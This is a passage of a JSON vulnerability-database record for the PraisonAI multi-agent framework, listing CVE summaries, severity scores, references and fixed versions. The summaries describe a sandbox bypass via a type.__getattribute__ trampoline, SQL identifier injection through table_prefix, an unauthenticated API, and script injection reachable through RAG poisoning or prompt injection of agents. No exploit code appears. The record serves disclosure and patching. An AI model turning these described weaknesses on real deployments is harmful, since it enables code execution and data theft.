:[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fvxx-ggmx-3cjg"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-fvxx-ggmx-3cjg","reference_id":"GHSA-fvxx-ggmx-3cjg","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-10T18:13:03Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-fvxx-ggmx-3cjg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373330?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5bh1-sfdc-ufcv"},{"vulnerability":"VCID-9h3n-jwrn-q3c7"},{"vulnerability":"VCID-9vfs-jdzz-ckcp"},{"vulnerability":"VCID-dwef-8k3v-jfb6"},{"vulnerability":"VCID-ekcf-zxgu-8yh1"},{"vulnerability":"VCID-fd7b-5q1f-qkh9"},{"vulnerability":"VCID-fnbr-df5j-hkay"},{"vulnerability":"VCID-gnv9-my7f-e7dc"},{"vulnerability":"VCID-nzu9-64um-47h7"},{"vulnerability":"VCID-vuwr-p2ef-w3ay"},{"vulnerability":"VCID-xzqd-zpz6-pbfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["CVE-2026-40113","GHSA-fvxx-ggmx-3cjg"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-npjp-51an-5qc6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/67660?format=json","vulnerability_id":"VCID-nzu9-64um-47h7","summary":"PraisonAI is a multi-agent teams system. From version 2.5.6 to before version 4.6.34, PraisonAI ships a legacy Flask API server with authentication disabled by default. When that server is used, any caller that can reach it can access /agents and trigger the configured agents.yaml workflow through /chat without providing a token. This issue has been patched in version 4.6.34.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44338","reference_id":"","reference_type":"","scores":[{"value":"0.00031","scoring_system":"epss","scoring_elements":"0.09612","published_at":"2026-06-11T12:55:00Z"},{"value":"0.02138","scoring_system":"epss","scoring_elements":"0.8463","published_at":"2026-06-14T12:55:00Z"},{"value":"0.02138","scoring_system":"epss","scoring_elements":"0.84637","published_at":"2026-06-13T12:55:00Z"},{"value":"0.02138","scoring_system":"epss","scoring_elements":"0.84628","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44338"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44338","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44338"},{"reference_url":"https://github.com/advisories/GHSA-6rmh-7xcm-cpxj","reference_id":"GHSA-6rmh-7xcm-cpxj","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6rmh-7xcm-cpxj"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-6rmh-7xcm-cpxj","reference_id":"GHSA-6rmh-7xcm-cpxj","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-08T14:14:21Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-6rmh-7xcm-cpxj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/375688?format=json","purl":"pkg:pypi/praisonai@4.6.34","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9h3n-jwrn-q3c7"},{"vulnerability":"VCID-gnv9-my7f-e7dc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.6.34"}],"aliases":["CVE-2026-44338","GHSA-6rmh-7xcm-cpxj"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nzu9-64um-47h7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/84433?format=json","vulnerability_id":"VCID-qm2f-sbc8-6ydj","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI's AST-based Python sandbox can be bypassed using type.__getattribute__ trampoline, allowing arbitrary code execution when running untrusted agent code. The _execute_code_direct function in praisonaiagents/tools/python_tools.py uses AST filtering to block dangerous Python attributes like __subclasses__, __globals__, and __bases__. However, the filter only checks ast.Attribute nodes, allowing a bypass. The sandbox relies on AST-based filtering of attribute access but fails to account for dynamic attribute resolution via built-in methods such as type.getattribute, resulting in incomplete enforcement of security restrictions. The string '__subclasses__' is an ast.Constant, not an ast.Attribute, so it is never checked against the blocked list. This vulnerability is fixed in 4.5.128.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40158","reference_id":"","reference_type":"","scores":[{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02286","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02288","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02287","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02282","published_at":"2026-06-13T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40158"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40158","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40158"},{"reference_url":"https://github.com/advisories/GHSA-3c4r-6p77-xwr7","reference_id":"GHSA-3c4r-6p77-xwr7","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3c4r-6p77-xwr7"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-3c4r-6p77-xwr7","reference_id":"GHSA-3c4r-6p77-xwr7","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-10T18:31:02Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-3c4r-6p77-xwr7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373330?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5bh1-sfdc-ufcv"},{"vulnerability":"VCID-9h3n-jwrn-q3c7"},{"vulnerability":"VCID-9vfs-jdzz-ckcp"},{"vulnerability":"VCID-dwef-8k3v-jfb6"},{"vulnerability":"VCID-ekcf-zxgu-8yh1"},{"vulnerability":"VCID-fd7b-5q1f-qkh9"},{"vulnerability":"VCID-fnbr-df5j-hkay"},{"vulnerability":"VCID-gnv9-my7f-e7dc"},{"vulnerability":"VCID-nzu9-64um-47h7"},{"vulnerability":"VCID-vuwr-p2ef-w3ay"},{"vulnerability":"VCID-xzqd-zpz6-pbfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["CVE-2026-40158","GHSA-3c4r-6p77-xwr7"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qm2f-sbc8-6ydj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/80695?format=json","vulnerability_id":"VCID-vuwr-p2ef-w3ay","summary":"PraisonAI is a multi-agent teams system. Prior to praisonai version 4.6.9 and praisonaiagents version 1.6.9, the fix for CVE-2026-40315 added input validation to SQLiteConversationStore only. Nine sibling backends — MySQL, PostgreSQL, async SQLite/MySQL/PostgreSQL, Turso, SingleStore, Supabase, SurrealDB — pass table_prefix straight into f-string SQL. Same root cause, same code pattern, same exploitation. 52 unvalidated injection points across the codebase. postgres.py additionally accepts an unvalidated schema parameter used directly in DDL. This issue has been patched in praisonai version 4.6.9 and praisonaiagents version 1.6.9.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41496","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03658","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03635","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03644","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03651","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41496"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41496","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41496"},{"reference_url":"https://github.com/advisories/GHSA-rg3h-x3jw-7jm5","reference_id":"GHSA-rg3h-x3jw-7jm5","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rg3h-x3jw-7jm5"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-rg3h-x3jw-7jm5","reference_id":"GHSA-rg3h-x3jw-7jm5","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-08T23:17:23Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-rg3h-x3jw-7jm5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373874?format=json","purl":"pkg:pypi/praisonai@4.5.149","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9h3n-jwrn-q3c7"},{"vulnerability":"VCID-9vfs-jdzz-ckcp"},{"vulnerability":"VCID-fd7b-5q1f-qkh9"},{"vulnerability":"VCID-gnv9-my7f-e7dc"},{"vulnerability":"VCID-nzu9-64um-47h7"},{"vulnerability":"VCID-t4qq-sgqa-ubet"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.149"}],"aliases":["CVE-2026-41496","GHSA-rg3h-x3jw-7jm5"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vuwr-p2ef-w3ay"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/84371?format=json","vulnerability_id":"VCID-xzqd-zpz6-pbfd","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.133, there is an SQL identifier injection vulnerability in SQLiteConversationStore where the table_prefix configuration value is directly concatenated into SQL queries via f-strings without any validation or sanitization. Since SQL identifiers cannot be safely parameterized, an attacker who controls the table_prefix value (e.g., through from_yaml or from_dict configuration input) can inject arbitrary SQL fragments that alter query structure. This enables unauthorized data access, such as reading internal SQLite tables like sqlite_master, and manipulation of query results through techniques like UNION-based injection. The vulnerability propagates from configuration input in config.py, through factory.py, to the SQL query construction in sqlite.py. Exploitation requires the ability to influence configuration input, and successful exploitation leads to internal schema disclosure and full query result tampering. This issue has been fixed in version 4.5.133.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40315","reference_id":"","reference_type":"","scores":[{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.14084","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.14057","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.14082","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13962","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40315"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.133","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.133"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40315","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40315"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/commit/0accebb2e3c3ec2fca66bbea0444fb7a35f0b4ef","reference_id":"0accebb2e3c3ec2fca66bbea0444fb7a35f0b4ef","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-14T13:25:07Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/commit/0accebb2e3c3ec2fca66bbea0444fb7a35f0b4ef"},{"reference_url":"https://github.com/advisories/GHSA-x783-xp3g-mqhp","reference_id":"GHSA-x783-xp3g-mqhp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x783-xp3g-mqhp"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-x783-xp3g-mqhp","reference_id":"GHSA-x783-xp3g-mqhp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-14T13:25:07Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-x783-xp3g-mqhp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373848?format=json","purl":"pkg:pypi/praisonai@4.5.133","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5bh1-sfdc-ufcv"},{"vulnerability":"VCID-9h3n-jwrn-q3c7"},{"vulnerability":"VCID-9vfs-jdzz-ckcp"},{"vulnerability":"VCID-dwef-8k3v-jfb6"},{"vulnerability":"VCID-ekcf-zxgu-8yh1"},{"vulnerability":"VCID-fd7b-5q1f-qkh9"},{"vulnerability":"VCID-fnbr-df5j-hkay"},{"vulnerability":"VCID-gnv9-my7f-e7dc"},{"vulnerability":"VCID-nzu9-64um-47h7"},{"vulnerability":"VCID-vuwr-p2ef-w3ay"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.133"}],"aliases":["CVE-2026-40315","GHSA-x783-xp3g-mqhp"],"risk_score":3.2,"exploitability":"0.5","weighted_severity":"6.5","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xzqd-zpz6-pbfd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/84188?format=json","vulnerability_id":"VCID-ypqr-zvrj-1qbk","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, the Flask API endpoint in src/praisonai/api.py renders agent output as HTML without effective sanitization. The _sanitize_html function relies on the nh3 library, which is not listed as a required or optional dependency in pyproject.toml. When nh3 is absent (the default installation), the sanitizer is a no-op that returns HTML unchanged. An attacker who can influence agent input (via RAG data poisoning, web scraping results, or prompt injection) can inject arbitrary JavaScript that executes in the browser of anyone viewing the API output. This vulnerability is fixed in 4.5.128.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40112","reference_id":"","reference_type":"","scores":[{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11699","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11669","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11619","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11692","published_at":"2026-06-13T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40112"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40112","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40112"},{"reference_url":"https://github.com/advisories/GHSA-cfg2-mxfj-j6pw","reference_id":"GHSA-cfg2-mxfj-j6pw","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cfg2-mxfj-j6pw"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-cfg2-mxfj-j6pw","reference_id":"GHSA-cfg2-mxfj-j6pw","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:43:40Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-cfg2-mxfj-j6pw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373330?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5bh1-sfdc-ufcv"},{"vulnerability":"VCID-9h3n-jwrn-q3c7"},{"vulnerability":"VCID-9vfs-jdzz-ckcp"},{"vulnerability":"VCID-dwef-8k3v-jfb6"},{"vulnerability":"VCID-ekcf-zxgu-8yh1"},{"vulnerability":"VCID-fd7b-5q1f-qkh9"},{"vulnerability":"VCID-fnbr-df5j-hkay"},{"vulnerability":"VCID-gnv9-my7f-e7dc"},{"vulnerability":"VCID-nzu9-64um-47h7"},{"vulnerability":"VCID-vuwr-p2ef-w3ay"},{"vulnerability":"VCID-xzqd-zpz6-pbfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["CVE-2026-40112","GHSA-cfg2-mxfj-j6pw"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ypqr-zvrj-1qbk"}],"fixing_vulnerabilities":[],"risk_score":"4.5","resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.126"}